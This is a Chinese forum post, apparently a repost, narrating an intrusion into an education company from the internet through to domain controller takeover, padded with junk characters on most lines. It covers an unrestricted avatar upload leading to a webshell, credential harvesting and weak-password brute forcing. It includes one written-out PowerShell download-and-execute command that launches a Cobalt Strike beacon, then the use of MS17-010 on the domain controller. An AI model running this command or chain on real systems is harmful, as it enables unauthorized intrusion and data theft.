|
; n1 G, Y4 U# e5 ]+ K: ^ 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
0 I( Q/ g* r$ M0 l9 l
6 W2 a5 x# s0 I$ s4 v
4 h* B5 s, e# J8 O1 Q3 ^
1 O2 A2 H$ j6 J `1 {* b. t7 M
( L2 m! \2 J4 d" o5 K% n% E, R" P; q O5 F; `8 I# ?% _9 A
正文3 Y6 G, z9 i. g6 Z" x s4 d
3 U4 a$ b7 @- l' Z; C
: M6 e$ O1 A& _* r" {! z0 k
/ O; @' y& X+ d: r8 r7 U
" s+ i* @% L6 H+ k$ X& D H- W1 U" N l. D
目标:www.xxxx.com(一家教育机构)
3 c9 b: W% M1 a' t& C打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
3 I8 [+ G: \4 P8 z# a$ N
7 }* O8 X/ F0 q* w+ N) e/ s# V5 f w6 b- d# @1 N3 T/ I! F$ s
 # k$ ~ w3 e* e( d/ f6 g
% d u! Q( J4 A) j2 o3 P$ r) K; }3 V$ J5 s4 s+ f
进行了简单的信息搜集
& i* d( S; p* s3 q" P% P% h. k2 i
- M! R r6 j% `
0 F! D+ l$ |+ P5 V
2 c, l1 U; Y g: m; Z7 W# r
' D- ^) \; z+ l. k: L( l 子域名搜集2 q- N2 ^# R! s0 V% T6 \9 m5 m2 |
0 ?! ?7 F) v) X! x$ K$ Q, q% r! f: v4 {) M3 o
 2 g% r8 n$ s6 |; p
8 x* m; c' R' t$ l9 u% ]) n" U& L
5 g0 L) l4 q; W' M) x5 K, j! Q fofa找资产
1 D( v9 k' f! D- y% J N$ c6 _: Q
) w* ~7 q% K+ ^: \5 E
$ l% i2 Q' @, R5 ?6 n5 u- _
4 y3 f: z5 Q; O6 Q, J; g
. B! ]4 M( V0 ~- r) l% |  4 K0 h7 z5 y. Z: L5 S7 K- @
+ D" n3 l" ]/ E5 k) j* e. H
- x2 K! c# Q0 O1 v" J8 Y } 一共七个资产。去重之后只有两个。
( V, w" e8 H' {4 s8 y3 [4 I
7 k! f2 y# H9 B
4 f4 |3 F# B1 I# X0 U, W A8 ~ & r+ S. \% {4 }, i: K
; ?5 r0 I8 n& C6 x
目录探测8 w3 }5 V+ u, w
# W0 I- H8 n+ [( J# [6 J3 G$ `" |9 n
0 Q. D# [. ^6 z. Z# K. k, v  0 K0 ^% s: S' y: v3 _
1 n6 Q4 o' z% B
8 Q# i' S4 ]; U' G3 |- I* W 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
( F& o0 C Z! d- V8 |
0 I5 S. A: F) r
$ w1 |! S Y! ^+ }; ~
# O9 W! M( I- z2 S) ], r. u+ c' a( U; F4 [# b
我又尝试了通过修改返回包来绕过登录界面+ c( u( ?1 I" i2 Q( [8 M5 N
6 \0 D6 Y2 J. @2 \/ {2 C" M( H9 \
: A/ t3 r [( O5 ^
$ z& N, S/ b0 O2 m( y- k
# p0 T3 s! q/ l" J. G$ y6 ^4 O, C1 p" z& d
还是不行,尝试注入无果
0 O. \( V. Y3 Z' f" A
, i+ w, _8 g w
, q& @3 l6 G/ X- o# d! ?) o 
j' }& k' ?# T8 P( c4 J0 H1 e " B' K! N; V# M( p9 c' S9 K
. X3 L4 ?: R% H# B) n
不过我目录探测出了一处Spring信息泄露
4 g5 L2 r& @( @2 t1 X0 W9 c& [
/ a$ r8 |, q/ g D+ z- K
' x: L5 l+ B3 {/ v, t( ?$ Y" D! z( } 6 i! S6 D2 q4 l8 M' z
- ^* c) l$ t+ N; O2 E 
7 R) a6 \, \: |4 r+ V. A' ~2 ? 1 ?0 t9 {6 N5 {+ h8 m. H3 V
5 f ]8 \+ l% r9 D6 c# `
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
( x! B: d) n7 Q; f
5 y/ Z. Z5 {$ [$ @: p9 u
' r$ w7 t1 c: K: Z* { 
5 H2 h* g0 d4 n# T6 @0 t ( f$ B% b- I/ m) b9 Q; v3 q' a, L
, l1 S/ B5 `4 i, ~* u
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
. o+ ?6 Z& p( `' G
$ ]* T# I9 g, {- H3 t+ L: Y. p- J5 l* I" ^ H. X& v
; @+ l) ~0 B' f, O4 _$ ? 9 z- u" z/ I: o9 w4 E
! d, N" |; Y& Z* k( x 获取有些师傅到这一步就手机抓包电脑测了。$ g9 ]/ a9 r4 [
( h! q: m% D# _; l n$ W
+ U/ i! f# H2 K' L3 _( C Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
' _* ~1 d# |9 b" n* C/ D7 P
9 a$ o( \. U1 k1 r) k! m4 ~4 b: }" g4 {. w% F2 M
其中在一个公众号发现了小程序,可以进行注册。% `, Y+ w, U) c% ~2 c+ B! [
: A+ @6 g3 A- N7 }) C
# B! E6 a# @ G! s: n& L 看到了头像上传,尝试上传获取WebShell, `- i8 U; |; m; f1 O
+ Y& D5 u8 C. d g; |, A* G1 R& n* \) K+ ^
' q( _1 W( ]! t% [9 i8 i
6 ~% o, U8 P3 G3 S0 x' \% W
; h @9 a* O. [9 _0 |" m, Y7 r 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问$ N) H# X' I1 y) s7 c7 p* i
& M, g% a6 n3 D. l. u
; _% a$ h" P7 S- y 
& f# l$ ^9 k) S" f) b6 X
# r s8 s% N4 j: m6 g% U5 I$ c
* w; U% v6 K" O4 U) l6 G5 _! S 然后上了大马
) ^: J: a* O2 @' a: e; v: D 6 j9 t& Q0 i, ]6 J5 r
' \7 `, U z; p5 u: g) F4 n
2 s% b: k, i! ^8 _0 ]
! X( Y E7 ~. x3 e
1 d# r i l0 h3 a# M; B  / E; {; O3 y; n0 K' b4 m
K4 v% a( a- l5 H/ V
' e% C4 p9 ^4 c4 Y 通过翻找文件发现数据库账号密码
$ s7 v9 T# U. v& w' Z3 W
% M) |5 F& t) e& w K# [$ ] g3 D4 A( S. t* Y- f$ D
) U' d/ @ I" d n6 P3 | : q5 Q: R1 X, ?9 c& V
9 h# Y/ l: B9 n' L" Q
--内网渗透
7 N7 A8 S- o7 t5 P
1 h7 i% r" a( X) D1 u; ?' @; y
: s! ]/ g5 i1 W1 F# b3 z 直接通过powershell执行 cs上线
& h, E2 q6 Y8 `: K# k- K+ @0 R " }( f7 C `- W. q4 a6 A
- H' k0 ?5 c$ G6 H: Z) t
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"! l+ ]- K6 X, e% d$ z
' d* ^! `; Z" b3 I! {' } H
3 F/ ~+ D/ f+ c* J
) E3 L: N7 a, h0 f& s
6 V4 \: r2 S0 A, f# d% Z; c7 B6 t/ ~0 [& J
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
% H( @0 n1 K d( @; x4 p' X
" H. ? H! W& i, Z& Q8 d3 h! G5 p5 a7 I5 }" j
 ! t, b* y$ k0 l9 I$ s, e/ [
! v( D' W+ G) X# D2 t {; R
- _. K' {# A) \$ _# P4 R1 V1 G3 A 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
% d3 Q) T) t+ f) ]
8 j" W0 [: W. Z# ~
. s* U3 b2 y4 x
' n0 z% ]! ]2 [8 c # e1 }% a1 l1 d# g" ~4 C4 s6 R4 Q
+ ?! ~$ o X3 Z6 V& I  1 y9 m0 L2 H: g/ ^; V
' }7 C0 V- B+ X1 G: o0 u0 k5 E
/ @, ~, [, K6 s8 _; P% V! F% k& o 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
. ^9 w5 `, m" K5 c4 K9 `
4 d) b2 L; ~6 O$ e. U4 m
# }" e7 J+ S1 L, F- H
1 x! g* N" D- a) x- Y7 L( ~! d) U8 B: k7 t- |
t" @! s- N9 @4 ~) ^& U# i3 m 0 ~* k/ Y; X( i' v; p
5 x+ p/ [ G, \7 L
! m( _; x: V* D. H F
+ Q- H' F+ A; Q5 i! l7 {0 a
* Z0 _5 ]3 n# R% m: l' V; Q7 o3 j% S 1 N. X% V2 l6 s( b k9 o0 H
0 c8 y" ?4 U; \' |
+ ^4 T/ |- p7 y1 m+ y
) U6 c5 O. T' O5 d7 B
! q$ M: i$ p3 `1 | 小结' U( H+ u. C# b+ B8 u z1 C* P
5 E0 g) ~8 N5 p* { |3 q- _6 D2 B @. J7 V2 d
! \4 ?& E; }9 x
9 @% G f) ]" e9 A c$ w6 I& N$ J6 j2 {+ t w4 @
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
1 ^9 ^4 h' X8 N& L1 ~9 j) X: ?
% `# {, _' w- a2 {+ }5 D
+ {% O9 [# N9 w" P' J- T
* H0 \: t# j- E/ Y: A
& `' _- z1 R% ^1 c
; `: J* T4 Y1 B+ | \, {7 h* y -
! i/ E7 p9 s/ u J7 J/ }
8 g6 J4 j5 Q& q
+ P" v* w( m6 n" M -
% y* a, Q c8 p1 a
/ |7 p- a- D4 F$ h! h1 G: g
$ t. g6 [0 c7 B; O5 u3 v( }, w7 U
8 Y+ y9 k: D, x5 ]) ~7 J6 j
5 U. X' U& @2 {" N 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html, p# q+ o8 p. u; P
. a2 t# \& P4 _1 z
5 E$ H" z) ?' `1 `* a: Q$ n
% p. w) ^/ V5 F
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对